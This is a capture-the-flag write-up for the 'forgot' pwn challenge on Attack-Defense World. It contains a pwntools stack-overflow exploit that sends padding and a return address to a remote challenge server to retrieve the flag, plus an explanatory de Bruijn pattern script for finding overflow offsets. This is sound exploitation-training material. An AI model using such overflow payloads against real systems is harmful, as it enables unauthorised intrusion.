攻防世界 (Attack-Defense World): pwn_forgot

  1. checksec
  2. gdb -q ./forgot
  3. start i
  4. pattern_create 100: attempt a stack overflow and find the overflow offset to overwrite
  5. r
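    exp:
```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *

context(arch='i386', os='linux')
r = remote('111.198.29.45', 32048)
# 63 bytes of padding, the offset used in this write-up
overflow = b"A" * 63
# 32-bit little-endian address written right after the padding
addr = 0x080486cc
overflow += p32(addr)
r.send(overflow + b"\n")
r.recvuntil(b"Enter the string to be validate")
flag = r.recv()
print("[*] Flag: " + flag.decode(errors="replace"))
r.close()
```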
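
Why the cyclic pattern in step 4 pinpoints the overflow offset, as an added example that is not part of the original write-up: every 4-byte window of the pattern is unique, so the 32-bit value seen in the debugger maps back to exactly one position in the input. The generator below is a standard de Bruijn construction, not the exact sequence gdb-peda's pattern_create emits, and the faulting value is constructed for illustration.

```python
import struct
from itertools import islice
from string import ascii_lowercase


def de_bruijn(alphabet: bytes, n: int):
    """Yield a de Bruijn sequence over `alphabet`: each n-byte window occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the sequence (the role of `pattern_create 100`)."""
    return bytes(islice(de_bruijn(ascii_lowercase.encode(), n), length))


def offset_of(value: int, length: int = 100) -> int:
    """Offset of a little-endian 32-bit register value in the pattern, -1 if absent."""
    return pattern(length).find(struct.pack("<I", value))


if __name__ == "__main__":
    p = pattern(100)
    # Constructed sample: the 4 pattern bytes an i386 process would load
    # if the overwritten pointer sat 63 bytes into the input.
    faulting_value = struct.unpack("<I", p[63:67])[0]
    print(p.decode())
    print(hex(faulting_value), "->", offset_of(faulting_value))
```

A value that is not found (result -1) means the register was not loaded from the pattern, which rules out a direct overwrite at that input length.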
